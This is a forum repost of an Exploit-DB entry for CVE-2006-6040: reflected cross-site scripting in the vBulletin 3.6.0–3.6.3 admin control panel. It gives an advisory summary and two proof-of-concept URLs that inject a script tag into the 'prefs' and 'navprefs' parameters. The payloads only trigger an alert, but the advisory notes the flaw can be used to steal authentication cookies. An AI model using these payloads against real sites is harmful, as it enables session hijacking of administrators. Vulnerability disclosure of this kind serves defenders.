Exploit vBulletin 3.6.x - Admin Control Panel Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29079
Проверка EDB
  1. Пройдено
Автор
INSANITY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-6040
Дата публикации
2006-11-17
Код:
source: https://www.securityfocus.com/bid/21157/info

vBulletin is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.

An attacker could exploit this vulnerability to have arbitrary script code execute in the context of the affected site. This may allow an attacker to steal cookie-based authentication credentials and to launch other attacks.

Versions 3.6.0 to 3.6.3 are vulnerable; other versions may also be affected.

http://www.example.com/vbulletin/admincp/index.php?do=buildnavprefs&nojs=0&prefs= "><script>alert("insanity")</script> http://www.example.com/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs= "><script>alert("insanity")</script>
 
Источник
www.exploit-db.com

Похожие темы